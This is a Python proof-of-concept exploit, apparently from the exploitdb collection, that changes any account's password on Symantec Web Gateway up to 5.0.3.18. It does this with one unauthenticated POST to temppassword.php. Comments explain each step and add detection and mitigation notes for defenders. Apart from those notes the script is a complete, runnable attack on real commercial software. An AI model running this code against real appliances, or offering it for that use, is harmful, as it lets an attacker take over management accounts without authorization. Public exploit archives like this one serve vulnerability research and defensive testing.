forked from offensive-security/exploitdb
#!/usr/bin/python
import urllib
import urllib2
import re
import sys
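# Proof-of-concept for the issue named in the banner below: an arbitrary
# password change in Symantec Web Gateway <= 5.0.3.18.
#
# What the script does: it sends a single HTTPS POST to
# /spywall/temppassword.php carrying a username and a new password. It sends
# no cookie, no session token and no current password, and it judges success
# only by a fixed string in the response body.
#
# Notes for defenders:
#   * Detection - in the appliance's web access logs, look for POST requests
#     to /spywall/temppassword.php, in particular from clients that have no
#     earlier login request, and correlate them with unexpected password
#     changes on management accounts.
#   * Mitigation - the banner gives 5.0.3.18 as the last affected build; move
#     to a later release (confirm the fixed version against the vendor
#     advisory) and keep the management interface reachable only from
#     administrative networks.
print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"

# Exactly three arguments are required: host, account name, new password.
if len(sys.argv) != 4:
    print "Usage: poc.py <RHOST> <username> <newpassword>"
    # A usage error is a failure; exit non-zero so a calling script can tell.
    sys.exit(1)

ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

url = "https://%s/spywall/temppassword.php" % (ip)

# Form fields submitted to temppassword.php. The new password is sent twice
# (password / password2); no field carries the account's current password.
opts = {
    'target': 'executive_summary.php',
    'USERNAME': username,
    'password': password,
    'password2': password,
    'Save': 'Save'
}

print "[*] Sending request to server..."
data = urllib.urlencode(opts)

# Passing a data argument makes urllib2 issue a POST rather than a GET.
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)
try:
    body = response.read()
finally:
    # Release the connection even if reading the body fails.
    response.close()

# The only success signal is this literal string in the returned page.
match = re.search('Your new password has been saved', body)
if match:
    # NOTE(review): this echoes the new password in clear text to stdout.
    print "[*] Password for %s changed to %s" % (username, password)
else:
    print "[*] Password change failed!"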